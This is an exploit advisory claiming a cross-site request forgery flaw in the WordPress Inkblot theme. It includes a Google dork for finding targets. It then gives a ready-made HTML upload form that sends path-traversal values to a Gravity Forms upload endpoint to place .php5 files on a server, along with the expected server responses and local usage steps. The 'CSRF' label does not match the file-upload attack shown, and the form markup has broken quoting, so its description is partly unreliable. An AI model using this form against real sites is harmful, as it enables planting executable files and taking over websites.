WordPress Inkblot Themes 4.9.10 Cross Site Request Forgery

1. ####################################################################
2.  
3. # Exploit Title : WordPress Inkblot Themes 4.9.10 Cross Site Request Forgery
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 22/05/2019
7. # Vendor Homepage : wordpress.org - gravityforms.com
8. # Software Download Link : github.com/mgsisk/inkblot/archive/master.zip
9. # Software Information Link : wordpress.org/themes/inkblot
10. # Software Affected Versions : 4.5.2 and 4.9.10 - 4.x
11. # Tested On : Windows and Linux
12. # Category : WebApps
13. # Exploit Risk : High
14. # Google Dorks : intext:Powered by WordPress with Inkblot
15. # Vulnerability Type : CWE-352 [ Cross-Site Request Forgery (CSRF) ]
16. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
17. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
18. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
19.  
20. ####################################################################
21.  
22. # Impact :
23. ***********
24. WordPress Inkblot Themes is vulnerable to cross-site request forgery, caused by
25. improper validation of user-supplied input. By persuading an authenticated user to visit
26. a malicious Web site, a remote attacker could send a malformed HTTP request to
27. perform unauthorized actions. An attacker could exploit this vulnerability to perform
28. cross-site scripting attacks, Web cache poisoning, and other malicious activities.
29.  
30. The web application does not, or can not, sufficiently verify whether a well-formed,
31. valid, consistent request was intentionally provided by the user who submitted the request.
32. When a web server is designed to receive a request from a client without any mechanism
33. for verifying that it was intentionally sent, then it might be possible for an attacker to trick a
34. client into making an unintentional request to the web server which will be treated as an
35. authentic request. This can be done via a URL, image load, XMLHttpRequest, etc. and
36. can result in exposure of data or unintended code execution.
37.  
38. ####################################################################
39.  
40. # CSRF Cross Site Request Forgery Exploit :
41. ****************************************
42. <title>WordPress Inkblot Themes Input Exploiter</title>
43.  
44. <form action="http://[VULNERABLEWEBSITE]/?gf_page=upload" method="post" enctype="multipart/form-data">
45.  
46. <body background=" ">
47.  
48. <input type="file" name="file" id="file"><br>
49. <input name="form_id" value="../../../" type=hidden">
50. <input name="name" value="kingskrupellos.html" type=''hidden">
51. <input name="gform_unique_id" value="../../" type="hidden">
52. <input name="field_id" value="" type="hidden">
53. <input type="submit" name="gform_submit" value="submit">
54.  
55. </form>
56.  
57. # Directory File Path :
58. ***********************
59. /_input__kingskrupellos.php5
60.  
61. /_input__[YOURFILENAME].php5
62.  
63. # Vulnerability Error :
64. *******************
65. {"status" : "error", "error" : {"code": 500, "message": "Failed to upload file."}}
66.  
67. # Vulnerability Error [ Successful ] :
68. *******************************
69. {"status":"ok","data":{"temp_filename":"..\/..\/_input__kingskrupellos.php5","uploaded_filename":"kingskrupellos.php"}}
70.  
71. # Allowed File Extensions :
72. *************************
73. .html .htm .php5 .php2 .txt .jpg .gif .png .html.fla .phtml .pdf
74.  
75. # Example Usage for Windows :
76. ******************************
77. # Use with XAMPP Control Panel and your Localhost.
78. # Use from htdocs folder located in XAMPP
79.  
80. # 127.0.0.1/wordpressinkblotexploiter.html
81.  
82. ####################################################################
83.  
84. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
85.  
86. ####################################################################